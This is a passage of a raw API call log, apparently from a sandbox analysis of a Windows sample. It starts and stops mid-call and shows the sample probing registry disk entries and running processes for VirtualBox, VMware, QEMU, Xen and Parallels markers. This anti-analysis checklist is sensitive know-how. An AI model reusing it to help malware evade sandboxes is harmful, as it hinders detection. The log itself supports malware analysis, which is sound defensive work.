uBytes=0x7c) returned 0x4148b0 [0150.091] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0150.092] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="qemu") returned 0x0 [0150.092] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="virtio") returned 0x0 [0150.092] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vmware") returned 0x0 [0150.092] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vbox") returned 0x0 [0150.092] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="xen") returned 0x0 [0150.093] LocalFree (hMem=0x4148b0) returned 0x0 [0150.093] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0150.093] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0150.093] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0150.094] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="qemu") returned 0x0 [0150.094] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="virtio") returned 0x0 [0150.094] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vmware") returned 0x0 [0150.094] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vbox") returned 0x0 [0150.094] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="xen") returned 0x0 [0150.095] LocalFree (hMem=0x4148b0) returned 0x0 [0150.095] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0150.095] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0150.095] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0150.139] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="qemu") returned 0x0 [0150.139] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="virtio") returned 0x0 [0150.139] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vmware") returned 0x0 [0150.139] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vbox") returned 0x0 [0150.139] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="xen") returned 0x0 [0150.140] LocalFree (hMem=0x4148b0) returned 0x0 [0150.140] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0150.140] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0150.140] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0150.794] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="qemu") returned 0x0 [0150.794] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="virtio") returned 0x0 [0150.794] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vmware") returned 0x0 [0150.794] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vbox") returned 0x0 [0150.794] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="xen") returned 0x0 [0150.796] LocalFree (hMem=0x4148b0) returned 0x0 [0150.797] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0150.797] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x4148b0 [0150.797] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7a, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0150.799] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="qemu") returned 0x0 [0150.799] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="virtio") returned 0x0 [0150.799] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vmware") returned 0x0 [0150.799] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vbox") returned 0x0 [0150.799] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="xen") returned 0x0 [0150.799] LocalFree (hMem=0x4148b0) returned 0x0 [0150.799] LocalFree (hMem=0x414878) returned 0x0 [0150.800] NtClose (Handle=0x80) returned 0x0 [0150.800] LocalFree (hMem=0x414768) returned 0x0 [0150.800] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414768 [0150.800] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0150.800] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0150.800] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0150.800] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0150.800] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414878 [0150.800] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414878, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414878, ResultLength=0x18ff50) returned 0x0 [0150.801] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0150.801] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x4148b0 [0150.801] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x50, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0150.801] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="qemu") returned 0x0 [0150.801] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="virtio") returned 0x0 [0150.801] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vmware") returned 0x0 [0150.801] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vbox") returned 0x0 [0150.801] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="xen") returned 0x0 [0150.801] LocalFree (hMem=0x4148b0) returned 0x0 [0150.801] LocalFree (hMem=0x414878) returned 0x0 [0150.802] NtClose (Handle=0x80) returned 0x0 [0150.802] LocalFree (hMem=0x414768) returned 0x0 [0150.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0x10558) returned 0xc0000004 [0150.802] LocalAlloc (uFlags=0x40, uBytes=0x11558) returned 0x4149b0 [0150.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4149b0, Length=0x11558, ResultLength=0x18ff5c | out: SystemInformation=0x4149b0, ResultLength=0x18ff5c*=0xcb78) returned 0x0 [0150.805] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0150.805] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0150.806] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0150.806] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0150.806] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0150.806] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0150.806] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0150.806] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.806] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0150.806] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0150.806] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.806] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.806] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.806] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.806] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.806] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0150.806] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0150.806] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.806] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.806] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.806] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.806] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.806] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0150.807] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0150.807] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.807] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.807] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.807] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.807] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.807] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0150.807] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0150.807] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.807] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.807] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.807] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.807] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.807] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0150.807] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0150.807] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.807] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.807] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.807] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.807] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.808] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0150.808] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0150.808] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.808] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.808] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.808] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.808] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.808] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0150.808] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0150.808] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.808] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.808] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.808] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.808] wcsstr (_Str="lsm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.808] wcsstr (_Str="lsm.exe", _SubStr="qga.exe") returned 0x0 [0150.808] wcsstr (_Str="lsm.exe", _SubStr="windanr.exe") returned 0x0 [0150.808] wcsstr (_Str="lsm.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.808] wcsstr (_Str="lsm.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.808] wcsstr (_Str="lsm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.808] wcsstr (_Str="lsm.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.809] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.810] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.811] wcsstr (_Str="explorer.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.811] wcsstr (_Str="explorer.exe", _SubStr="qga.exe") returned 0x0 [0150.811] wcsstr (_Str="explorer.exe", _SubStr="windanr.exe") returned 0x0 [0150.811] wcsstr (_Str="explorer.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.811] wcsstr (_Str="explorer.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.811] wcsstr (_Str="explorer.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.811] wcsstr (_Str="explorer.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.811] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.811] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0150.811] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0150.811] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.811] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.811] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.811] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.811] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.811] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.811] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.811] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.811] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.811] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.811] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.812] wcsstr (_Str="spoolsv.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.812] wcsstr (_Str="spoolsv.exe", _SubStr="qga.exe") returned 0x0 [0150.812] wcsstr (_Str="spoolsv.exe", _SubStr="windanr.exe") returned 0x0 [0150.812] wcsstr (_Str="spoolsv.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.812] wcsstr (_Str="spoolsv.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.812] wcsstr (_Str="spoolsv.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.812] wcsstr (_Str="spoolsv.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.812] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.812] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0150.812] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0150.812] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.812] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.812] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.812] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.812] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.812] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.812] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.812] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.812] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.812] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.813] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.813] wcsstr (_Str="officeclicktorun.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.813] wcsstr (_Str="officeclicktorun.exe", _SubStr="qga.exe") returned 0x0 [0150.813] wcsstr (_Str="officeclicktorun.exe", _SubStr="windanr.exe") returned 0x0 [0150.813] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.813] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.813] wcsstr (_Str="officeclicktorun.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.813] wcsstr (_Str="officeclicktorun.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.813] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.813] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0150.813] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0150.813] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.813] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.813] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.813] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.813] wcsstr (_Str="wmiprvse.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.813] wcsstr (_Str="wmiprvse.exe", _SubStr="qga.exe") returned 0x0 [0150.813] wcsstr (_Str="wmiprvse.exe", _SubStr="windanr.exe") returned 0x0 [0150.813] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.813] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.813] wcsstr (_Str="wmiprvse.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.814] wcsstr (_Str="wmiprvse.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.814] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.823] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0150.823] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0150.823] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.823] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.823] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.823] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.823] wcsstr (_Str="sppsvc.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.823] wcsstr (_Str="sppsvc.exe", _SubStr="qga.exe") returned 0x0 [0150.823] wcsstr (_Str="sppsvc.exe", _SubStr="windanr.exe") returned 0x0 [0150.823] wcsstr (_Str="sppsvc.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.823] wcsstr (_Str="sppsvc.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.823] wcsstr (_Str="sppsvc.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.824] wcsstr (_Str="sppsvc.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.824] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.824] wcsstr (_Str="sufferexistrich.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.824] wcsstr (_Str="sufferexistrich.exe", _SubStr="qga.exe") returned 0x0 [0150.824] wcsstr (_Str="sufferexistrich.exe", _SubStr="windanr.exe") returned 0x0 [0150.824] wcsstr (_Str="sufferexistrich.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.825] wcsstr (_Str="sufferexistrich.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.825] wcsstr (_Str="sufferexistrich.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.825] wcsstr (_Str="sufferexistrich.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.825] wcsstr (_Str="have return physical.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.825] wcsstr (_Str="have return physical.exe", _SubStr="qga.exe") returned 0x0 [0150.825] wcsstr (_Str="have return physical.exe", _SubStr="windanr.exe") returned 0x0 [0150.825] wcsstr (_Str="have return physical.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.825] wcsstr (_Str="have return physical.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.825] wcsstr (_Str="have return physical.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.825] wcsstr (_Str="have return physical.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.825] wcsstr (_Str="or level.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.825] wcsstr (_Str="or level.exe", _SubStr="qga.exe") returned 0x0 [0150.825] wcsstr (_Str="or level.exe", _SubStr="windanr.exe") returned 0x0 [0150.825] wcsstr (_Str="or level.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.825] wcsstr (_Str="or level.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.825] wcsstr (_Str="or level.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.825] wcsstr (_Str="or level.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.825] wcsstr (_Str="court camera.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.825] wcsstr (_Str="court camera.exe", _SubStr="qga.exe") returned 0x0 [0150.825] wcsstr (_Str="court camera.exe", _SubStr="windanr.exe") returned 0x0 [0150.826] wcsstr (_Str="court camera.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.826] wcsstr (_Str="court camera.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.826] wcsstr (_Str="court camera.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.826] wcsstr (_Str="court camera.exe", _SubStr="prl_tools.exe") returned 0x0 [0150.826] wcsstr (_Str="or-finger.exe", _SubStr="qemu-ga.exe") returned 0x0 [0150.826] wcsstr (_Str="or-finger.exe", _SubStr="qga.exe") returned 0x0 [0150.826] wcsstr (_Str="or-finger.exe", _SubStr="windanr.exe") returned 0x0 [0150.826] wcsstr (_Str="or-finger.exe", _SubStr="vboxservice.exe") returned 0x0 [0150.826] wcsstr (_Str="or-finger.exe", _SubStr="vboxtray.exe") returned 0x0 [0150.826] wcsstr (_Str="or-finger.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0150.826] wcsstr 